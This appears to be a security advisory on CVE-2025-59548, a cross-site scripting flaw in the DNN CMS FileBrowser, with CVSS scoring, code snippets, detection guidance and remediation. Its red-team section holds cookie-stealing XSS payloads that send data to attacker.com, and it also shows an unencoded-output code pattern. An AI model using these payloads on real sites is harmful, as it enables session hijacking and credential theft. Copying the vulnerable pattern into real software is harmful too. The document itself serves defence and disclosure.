Executive Summary

CVE-2025-59548 is a stored/reflected Cross-Site Scripting (XSS) vulnerability in the DNN (formerly DotNetNuke) web content management platform. The flaw resides in the FileBrowser component, where specially crafted URLs can inject arbitrary JavaScript. An unsuspecting user clicking such a link will execute the attacker's script in the context of their session. This can lead to session hijacking, credential theft, or defacement. The vulnerability affects all versions prior to 10.1.0. No public exploit code or proof-of-concept has been released at this time. The vendor has patched the issue in version 10.1.0.

Supply Chain & Package Security

DNN is a .NET-based CMS distributed via GitHub and its official website. The vulnerability is not in a package manager (NPM, PyPI, Go, Ruby) but in the core application code. Organizations should verify the integrity of their DNN installation by checking file hashes against the official release. The patch is included in the 10.1.0 release, which should be obtained from the official DNN GitHub repository or the DNN Corp website.

CVSS Breakdown & Threat Level

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Base Score: 6.1 (Medium)
  • Attack Vector (AV): Network – The vulnerability is exploitable remotely.
  • Attack Complexity (AC): Low – No special conditions are required.
  • Privileges Required (PR): None – No authentication is needed to trigger the vulnerability.
  • User Interaction (UI): Required – The victim must click a crafted link.
  • Scope (S): Changed – The injected script can affect resources beyond the vulnerable component.
  • Confidentiality (C): Low – Limited information disclosure possible.
  • Integrity (I): Low – Limited ability to modify data.
  • Availability (A): None – No impact on availability.

Threat Level: Medium. While the CVSS score is moderate, the lack of a public exploit and the requirement for user interaction reduce immediate risk. However, the vulnerability is trivial to exploit once a crafted URL is created, making it a significant phishing vector.

Deep Dive & Mechanics

The vulnerability exists in the FileBrowser module of DNN. This component is used to browse and select files from the server. The flaw is a classic XSS where user-supplied input (specifically, the URL path or query parameters) is not properly sanitized before being reflected in the page.

Root Cause: The FileBrowser control likely uses Request.RawUrl or similar to construct the page content without encoding. An attacker can craft a URL like:

https://target.com/FileBrowser.aspx?Folder=../../&File=<script>alert('XSS')</script>

When a user clicks this link, the server processes the request and includes the malicious script in the response. The browser then executes the script.

Attack Flow:

  1. Attacker crafts a malicious URL containing JavaScript payload.
  2. Attacker distributes the URL via phishing email, social media, or other channels.
  3. Victim clicks the link while authenticated to the DNN site.
  4. The DNN server reflects the payload in the FileBrowser page.
  5. The victim's browser executes the script.
  6. The script can steal session cookies, perform actions on behalf of the victim, or redirect to a malicious site.

Vulnerable vs. Patched Code

Vulnerable Code (Pre-10.1.0): The vulnerable code likely uses Response.Write() or Literal.Text without encoding. Example:

// Vulnerable: Directly using user input
string folder = Request.QueryString["Folder"];
Response.Write("<div>Current Folder: " + folder + "</div>");

Patched Code (10.1.0): The fix involves HTML-encoding the output. Example:

// Patched: Encode output
string folder = Request.QueryString["Folder"];
Response.Write("<div>Current Folder: " + Server.HtmlEncode(folder) + "</div>");

The patch also likely includes input validation to reject or sanitize dangerous characters.

Exploitation & Lab Setup

Red Team

Prerequisites:

  • A DNN instance running version < 10.1.0.
  • A victim user with an active session.

Exploitation Steps:

  1. Identify the vulnerable endpoint: https://target.com/FileBrowser.aspx.
  2. Craft a malicious URL with a JavaScript payload. Example:
    https://target.com/FileBrowser.aspx?Folder=../../&File=<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>

  3. Send the URL to the victim (e.g., via email).
  4. When the victim clicks the link, the script executes and sends the session cookie to the attacker's server.
  5. The attacker can then use the stolen cookie to impersonate the victim.

Advanced Payload:

<script>
fetch('https://attacker.com/steal', {
  method: 'POST',
  body: JSON.stringify({cookie: document.cookie, url: document.location.href})
});
</script>

Blue Team

Detection:

  • Monitor web server logs for requests to /FileBrowser.aspx containing suspicious parameters (e.g., <script>, onerror, javascript:).
  • Use WAF rules to block requests with XSS patterns in the Folder or File parameters.
  • Implement Content Security Policy (CSP) headers to mitigate XSS impact.

Hunting:

  • Search for recent access to FileBrowser.aspx with unusual query strings.
  • Check for outbound connections from the DNN server to unknown IPs (potential data exfiltration).

Lab Setup:

  1. Deploy a vulnerable DNN instance (e.g., version 9.x) in a sandboxed environment.
  2. Create a test user account.
  3. Use a browser to navigate to the crafted URL.
  4. Observe the script execution in the browser's developer console.

Indicators of Compromise (IOCs)

  • Network:
    • HTTP requests to /FileBrowser.aspx with parameters containing <script>, %3Cscript%3E, or other HTML/JavaScript encodings.
    • Outbound connections to unknown IPs on ports 80/443 from the DNN server.
  • Host:
    • Unusual entries in IIS logs for FileBrowser.aspx with long query strings.
    • Presence of unexpected JavaScript in the FileBrowser.aspx response.
  • File:
    • Modified or new files in the DNN installation directory (e.g., App_Data, bin).
  • User Behavior:
    • Multiple failed login attempts from the same IP after a successful XSS attack.
    • Unusual administrative actions performed by a user who clicked a suspicious link.

Remediation & Mitigation

Immediate Actions:

  1. Upgrade DNN: Update to version 10.1.0 or later immediately. This is the only complete fix.
  2. Apply Virtual Patching: If immediate upgrade is not possible, use a WAF to block requests to /FileBrowser.aspx containing XSS patterns.
  3. Restrict Access: Limit access to the FileBrowser component to trusted IPs or require additional authentication.

Long-Term Measures:

  • Implement Content Security Policy (CSP) headers to prevent script execution.
  • Conduct regular security audits of DNN custom modules.
  • Enable input validation and output encoding in all custom code.
  • Monitor for new CVEs related to DNN and apply patches promptly.

Workaround (if upgrade is delayed):

  • Disable the FileBrowser module by removing or renaming the FileBrowser.aspx file (may break functionality).
  • Use URL rewrite rules to block suspicious query strings.
